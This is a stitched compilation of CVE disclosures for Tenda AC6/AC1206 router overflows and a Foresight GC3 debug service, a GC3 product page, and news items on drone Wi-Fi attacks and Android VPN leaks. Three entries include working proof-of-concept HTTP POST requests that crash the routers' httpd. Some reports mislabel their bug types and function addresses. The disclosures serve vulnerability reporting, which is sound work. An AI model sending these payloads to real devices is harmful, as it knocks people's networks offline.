Tenda AC1200 US_AC6V2.0RTL_V15.03.06.51_multi_TDE01 was discovered to contain a buffer overflow in the 0x4a12cc function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request.

**Vulnerability Report**

Vendor: Tenda

Product: AC1200 Smart Dual-Band WiFi Router

Version: US\_AC6V2.0RTL\_V15.03.06.51\_multi\_TDE01(Download Link:https://www.tendacn.com/download/detail-3794.html)

Type: Buffer Overflow

**Vulnerability description**

We found a buffer overflow vulnerability in AC1200 with firmware which was released recently, allows remote attackers to destory the execution memory from a crafted request. This can cause a denial of service or impact code execution.

**Remote Command Execution**

In httpd binary:

In function 0x4a12cc, the value of _src is obtained through websGerVar.

The _src is copied to info.urls via strcpy. However, the length of _src is not checked, the buffer of info is 0x254 bytes. This can lead to buffer overflows.

CVE-2022-41483: Bug-Report/tenda-AC6- 0x4212cc.md at main · Davidteeri/Bug-Report

Tenda AC1200 US_AC6V2.0RTL_V15.03.06.51_multi_TDE01 was discovered to contain a buffer overflow in the 0x47c5dc function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request.

**Vulnerability Report**

Vendor: Tenda

Product: AC1200 Smart Dual-Band WiFi Router

Version: US\_AC6V2.0RTL\_V15.03.06.51\_multi\_TDE01(Download Link:https://www.tendacn.com/download/detail-3794.html)

Type: Buffer Overflow

**Vulnerability description**

We found a buffer overflow vulnerability in AC1200 with firmware which was released recently, allows remote attackers to destory the execution memory from a crafted request. This can cause a denial of service or impact code execution.

**Remote Command Execution**

In httpd binary:

In function 0x47c5dc, take the content before ';' of recv_buf to pcVar2 through strchr. If the content is not empty, then take the content after the 'set' and store it in pcVar2.

Then use strchr to take the content after '=' of pcVar2 and store it in pvalue. But the length of pvalue is not checked and copied into value by strcpy. The length of value is 1024 bytes. The original recv_buf length is 4096 bytes, so the length of the pvalue may be greater than 1024 bytes. This results in a buffer overflow.

CVE-2022-41482: Bug-Report/tenda-AC6- 0x47c5dc_value.md at main · Davidteeri/Bug-Report

Tenda AC1200 US_AC6V2.0RTL_V15.03.06.51_multi_TDE01 was discovered to contain a buffer overflow in the 0x475dc function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request.

**Vulnerability Report**

Vendor: Tenda

Product: AC1200 Smart Dual-Band WiFi Router

Version: US\_AC6V2.0RTL\_V15.03.06.51\_multi\_TDE01(Download Link:https://www.tendacn.com/download/detail-3794.html)

Type: Buffer Overflow

**Vulnerability description**

We found a buffer overflow vulnerability in AC1200 with firmware which was released recently, allows remote attackers to destory the execution memory from a crafted request. This can cause a denial of service or impact code execution.

**Remote Command Execution**

In httpd binary:

In function 0x47c5dc, take the content before ';' of recv_buf to pcVar2 through strchr. If the content is not empty, then take the content after the 'set' and store it in pcVar2.

Then pcVar2 is copied into name by strcpy. However the length of pcVar2 is not checked. The buffer for name is 64 bytes. The original recv_buf length is 4096 bytes, so the length of pcVar2 may be greater than 64 bytes. This results in a buffer overflow.

CVE-2022-41480: Bug-Report/tenda-AC6- 0x47c5dc - name.md at main · Davidteeri/Bug-Report

Tenda AC1200 US_AC6V2.0RTL_V15.03.06.51_multi_TDE01 was discovered to contain a buffer overflow in the 0x47de1c function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request.

**Vulnerability Report**

Vendor: Tenda

Product: AC1200 Smart Dual-Band WiFi Router

Version: US\_AC6V2.0RTL\_V15.03.06.51\_multi\_TDE01(Download Link:https://www.tendacn.com/download/detail-3794.html)

Type: Buffer Overflow

**Vulnerability description**

We found a buffer overflow vulnerability in AC1200 with firmware which was released recently, allows remote attackers to destory the execution memory from a crafted request. This can cause a denial of service or impact code execution.

**Remote Command Execution**

In httpd binary:

In the function 0x47de1c (readUsb), the mountpoint and filename are copied to mntFileName through sprntf, but there is no length check for these two variables, which will cause the buffer to be destroyed.

CVE-2022-41481: Bug-Report/tenda-AC6- 0x47de1c.md at main · Davidteeri/Bug-Report

Foresight GC3 Launch Monitor 1.3.15.68 ships with a Target Communication Framework (TCF) service enabled. This service listens on a TCP port on all interfaces and allows for process debugging, file system modification, and terminal access as the root user. In conjunction with a hosted wireless access point and the known passphrase of FSSPORTS, an attacker could use this service to modify a device and steal intellectual property.

**Industry-leading performance insight and true-to-life simulation in our most approachable offering yet.**

From $6,995 or $???/mo

Handle

**Take it for a spin.**

Three precision cameras for both ball and club data. Four ways to connect. A touch screen display that’s easy to read indoors and out. Add it all up and you’ve got the ultimate personal launch monitor.

**Ready for anything**

**On the Range**

From the PGA Tour to the home simulator, our GC line of launch monitors is the most awarded, most trusted, and best selling professional-grade launch monitor line ever. When performance matters, the choice is easy — GC3.

**In the Studio**

Our award-winning simulation packages, combined with the GC3, make the game’s best indoor experience possible — now at an almost impossibly low price.

**Precision inside — and out.**

Thanks to the advanced photometric technology inside, the GC3 remains accurate and reliable both on the range and in your home simulator. No other launch monitor tech compares with the GC line when it comes to delivering real-time performance insight.

**Your game   
reimagined.**

The GC3 isn't just a weapon of mass instruction, it's your gateway to a whole new gaming experience. Combine it with our FSX performance and gaming suite and enjoy hundreds of world-class courses, skill-building games, and global leagues and competitions.

​

**Which launch monitor is right for you?**

No other launch monitor tech compares with the GC line when it comes to delivering real-time performance insight. Which model best fits your play?

**Compare Launch Monitors**

Read More

**Compare Launch Monitors**

​

**GC3**

From $6,995? or $???/mo

Buy now

**GCQuad**

From $11,000 or $166/mo

Buy now Learn more

Ball Data

Launch Angle  
Side Angle  
Ball Speed  
Total Spin  
Carry  
Side Spin/Spin Axis

Launch Angle  
Side Angle  
Ball Speed  
Total Spin  
Carry  
Side Spin/Spin Axis

Club Data

Club Head Speed  
Smash Factor  
Club Path  
Angle of Attack  
\-  
\-  
\-  
\-

Club Head Speed  
Smash Factor  
Club Path  
Angle of Attack  
Loft/Lie  
Face Angle  
Impact Location  
Closure Rate

Putting Analysis

No

Yes

Hitting Zone

7” x 10”

18” x 14”

Cameras

3 (Triscopic)

4 (Quadrascopic)

Light Source

Integrated Infrared

Integrated Infrared

Battery

Fixed Lithium Ion

Interchangeable Lithium Ion

Display Type

Standard Transflective LCD  
(Touchscreen Enabled)

Premium Reflective Memory Display  
(Outdoor Viewability)

Fold-Out Ground Stabilizer

No

Yes

Finish Material

Thermo Plastic  
Rubberized Material

Thermo Plastic Rubberized Material with Premium Metallic Finish

Barometric Sensor

Yes

Yes

Accelorometer

Yes

Yes

WiFi

Yes

Yes

Ethernet

Yes

Yes

USB Type

C

C

Bluetooth

No

Yes

Alignment Stick

Included

Included

Warranty

1-year US

2-year US

Size

6” (w) x 12” (h) x 5” (d)

7” (w) x 12.5” (h) x 4” (d)

Weight

5lbs / 2.3kg

7.5lbs / 3.8kg

Battery Life

5-7 Hours

6-8 Hours

**Ready?  
Let's do this.**

The GC3 is the Game Changer you've been holding out for. So take the next step and turn your game goals into a reality — it all starts with the press of a button.

From $6,995 or $???/mo

**It's a Game Changer**

Contact Foresight Sports today to learn more.

CVE-2022-40187: GC3 | Foresight Sports

Tenda AC1206 US_AC1206V1.0RTL_V15.03.06.23_multi_TD01 was discovered to contain a heap overflow via sched_start_time parameter.

Affect device: Tenda-AC1206 US\_AC1206V1.0RTL\_V15.03.06.23\_multi\_TD01(https://www.tenda.com.cn/download/detail-2766.html)

Vulnerability Type: Heap overflow

Impact: Denial of Service(DoS)

**Vulnerability description**

This vulnerability lies in the /goform/openSchedWifi page which influences the lastest version of Tenda-AC1206 US\_AC1206V1.0RTL\_V15.03.06.23\_multi\_TD01 (https://www.tenda.com.cn/download/detail-2766.html)

The vulnerability exists in the file /bin/httpd , function **setSchedWifi**.

User control pointer parameter _**sched\_start\_time**_ in web requesting; _**wlan\_switch**_ is an array on the heap, and using strcpy to copy _**sched\_start\_time**_ to _**wlan\_switch**_ without length limit will cause heap overflow.

**POC and repetition**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

POST /goform/openSchedWifi HTTP/1.1
Host: 192.168.23.133
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q\=0.8,application/signed\-exchange;v\=b3;q\=0.9
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9
Cookie: password\=byn5gk
Connection: close
Content\-Length: 1552

schedWifiEnable\=0&schedStartTime\=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

CVE-2022-42080: myCVE/AC1206-4.md at main · tianhui999/myCVE

Tenda AC1206 US_AC1206V1.0RTL_V15.03.06.23_multi_TD01 was discovered to contain a stack overflow via sched_end_time parameter.

Affect device: Tenda-AC1206 US\_AC1206V1.0RTL\_V15.03.06.23\_multi\_TD01(https://www.tenda.com.cn/download/detail-2766.html)

Vulnerability Type: Heap overflow

Impact: Denial of Service(DoS)

**Vulnerability description**

This vulnerability lies in the /goform/openSchedWifi page which influences the lastest version of Tenda-AC1206 US\_AC1206V1.0RTL\_V15.03.06.23\_multi\_TD01 (https://www.tenda.com.cn/download/detail-2766.html)

The vulnerability exists in the file /bin/httpd , function **setSchedWifi**.

User control pointer parameter _**sched\_end\_time**_ in web requesting; _**wlan\_switch**_ is an array on the heap, and using strcpy to copy _**sched\_end\_time**_ to _**wlan\_switch**_ without length limit will cause heap overflow.

**POC and repetition**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

POST /goform/openSchedWifi HTTP/1.1
Host: 192.168.23.133
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q\=0.8,application/signed\-exchange;v\=b3;q\=0.9
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9
Cookie: password\=byn5gk
Connection: close
Content\-Length: 265

schedWifiEnable\=0&schedEndTime\=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

CVE-2022-42081: myCVE/AC1206-5.md at main · tianhui999/myCVE

Tenda AC1206 US_AC1206V1.0RTL_V15.03.06.23_multi_TD01 was discovered to contain a stack overflow via the function formWifiBasicSet.

Affect device: Tenda-AC1206 US\_AC1206V1.0RTL\_V15.03.06.23\_multi\_TD01(https://www.tenda.com.cn/download/detail-2766.html)

Vulnerability Type: Stack overflow

Impact: Denial of Service(DoS)

**Vulnerability description**

This vulnerability lies in the /goform/WifiBasicSet page which influences the lastest version of Tenda-AC1206 US\_AC1206V1.0RTL\_V15.03.06.23\_multi\_TD01 (https://www.tenda.com.cn/download/detail-2766.html)

The vulnerability exists in the file /bin/httpd , function **formWifiBasicSet**.

User control pointer parameter _**security\_5g**_ in web requesting; _**param\_5g**_ is an array on the stack, and using strcpy to copy _**security\_5g**_ to _**param\_5g**_ without length limit will cause stack overflow.

**POC and repetition**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

POST /goform/WifiBasicSet HTTP/1.1
Host: 192.168.23.133
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q\=0.8,application/signed\-exchange;v\=b3;q\=0.9
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9
Cookie: password\=rjy5gk
Connection: close
Content\-Length: 3660

security\_5g\=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

CVE-2022-42079: myCVE/AC1206-3.md at main · tianhui999/myCVE

Drone-based cyberattacks to spy on corporate targets are no longer hypothetical, one incident from this summer shows.

Once limited to abstract academic conversation among cybersecurity enthusiasts, drones loaded with cyber-spying equipment are now being used in the real world to breach networks and steal information.

Cybersecurity researcher Greg Linares shared a Twitter thread on Oct. 10 providing an overview of a drone-based cyberattack he was privy to over the summer.

He explained it started when an unnamed financial company picked up unusual traffic on its network. A trace of the Wi-Fi signal behind the network activity led the threat hunters to the roof, where two drones were found. One was a modified DJI Phantom carrying what Linares called a "modified Wifi Pineapple device"; the other was a likewise modified DJI Matrice 600 drone loaded with "a Raspberry Pi, batteries, a GPD mini laptop, a 4G modem and another Wi-Fi device," he added.

The cyberattack was partially successful, allowing attackers to target the internal Atlassian Confluence page to get access to credentials and other devices, Linares said. However, the threat hunters found one of the drones damaged, but still functioning.

"The attack was a limited success, and it appears that once the attackers were discovered, they accidentally crashed the drone on recovery," Linares tweeted.

He explained this sort of drone exploit delivery attack probably cost no more than $15,000 to put together.

"Attackers are spending this range of budget in order to target your internal devices and are ok with burning it," he cautioned. "This is the third real-world drone based attack I have encountered in two years."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Airborne Drones Are Dropping Cyber-Spy Exploits in the Wild

The platform lets network connectivity data escape outside of the secure tunnel when connected to a public network, posing a "privacy concern" for users with "certain threat models," researchers said.

Android devices are leaking certain traffic when a mobile device is connected to a Wi-Fi network, even when features aimed to protect data being sent over the public Internet by using virtual private networks (VPNs) are enabled.

The issue could poke a hole in a user's ability to remain anonymous when using a VPN to encrypt data being sent from an Android device over a public Wi-Fi network, allowing a would-be attacker to monitor a user's traffic and even pinpoint someone's location, researchers noted.

A security audit conducted by Mullvad VPN identified the issue, which it reported to Google's Android team. It found that the Android mobile OS — which has nearly 3 billion users worldwide — is sending connectivity checks outside the VPN tunnel.

"It does this every time the device connects to a Wi-Fi network, even when the _Block connections without VPN_ setting is enabled," they wrote in the post. "The connection check traffic can be observed and analyzed by the party controlling the connectivity check server and any entity observing the network traffic.

This could allow a threat actor to derive information beyond merely the fact that the Android device is connected, such as a user's location if "combined with data such as Wi-Fi access point locations," the Mullvad researchers noted.

Android, for its part, says the function is working as intended, and that no fix is necessary.

**Defending Default Behavior**

It makes sense for Android to send connectivity data traffic by default, the Mullvad researchers acknowledged, such as when there is a captive portal on the network, they said.

In this case, the connection will be unusable until the user has logged in to it, "so most users will want the captive portal check to happen and allow them to display and use the portal," the researchers wrote.

Still, as there seems to be no way to prevent Android from leaking traffic, the issue remains unresolved and potentially a risk for some users, the researchers said. Moreover, Android's current documentation about how the OS blocks connections without a VPN is misleading, they wrote, even if a user is "fine with some traffic going outside the VPN tunnel."

As it would require a "sophisticated actor" to use connectivity checks against someone using an Android phone, "most of our users are probably unlikely consider it a significant risk," the researchers acknowledged.

But the feature as currently documented by Android gives a user the impression "that no traffic will leave the phone except through the VPN" when the feature is turned on, which is not the case, the Mullvad researchers said.

Previously, on Sept. 29, Mullvad had posted on Android IssueTracker suggesting a change to the documentation regarding the "Block connections without VPN" feature to alert users to potential data leakage.

To remedy this issue, researchers suggested adding "except connectivity checks" to documentation references that claim the feature allows people using a device or an IT admin to force all traffic to use the VPN, or blocks any network traffic that doesn't use the VPN for clarification. The issue remains pending.

Dark Reading has reached out to Android for comment.

**Connection Checks Working as Intended**

The researchers reported the mobile system's actual leaking of connectivity data to Android on its IssueTracker message board site. Android responded quickly that it was looking into it.

A Google engineer later defended the current state of the "Block connections without VPN" feature, responding that the status of the issue is "Won't Fix" as "this is working as intended" in a comment posted Oct. 6.

The engineer stated four reasons for declining to add an option in Android to disable connectivity checks. One is that the VPN might be actually relying on the result of these connectivity checks, while another is that the VPN may be a split tunnel, letting part of the traffic over the underlying network, or only affect a given set of apps.

Further, the connectivity checks are far from the only thing exempted from the VPN, as privileged apps can also bypass the VPN, and this is necessary for their operation in many cases, the engineered stated.

Finally, Google's position is that it's unclear as to what specific impact on privacy the issue has, as "connectivity checks reveal there is an Android device at this address, which is plenty clear from the L2 connection and from the traffic going over the VPN anyway," according to the engineer.

**High-Profile Risk**

Mullvad's point that the leak could pose a threat to some users certainly has validity, especially given the increased interest by state-sponsored threat actors to use spyware and other ways to monitor and even persecute high-profile Android users such as journalists, activists, academics, and politicians.

VPNs are meant to ensure that network connections using them encrypt Internet traffic over public networks, meaning that they use the IP address of a designated VPN service rather than someone's public IP address. This allows high-risk users who know they need extra security when their devices are connected to public Wi-Fi networks to hide their activity from prying eyes.

Mullvad acknowledged that there is nothing that the company or anyone else can do to fix the Android leaks if Google doesn't take action to change the OS.

However, there is one Android-based distribution, GrapheneOS, that gives users the option to disable connectivity checks within the mobile OS, the researchers said. With this feature enabled in devices using the distribution, Mullvad researchers said they could not observe the connections.

In light of this, the researchers reiterated their position that Google consider adopting this same ability to disable connectivity checks into stock Android, they concluded in their post.

Tag

#wifi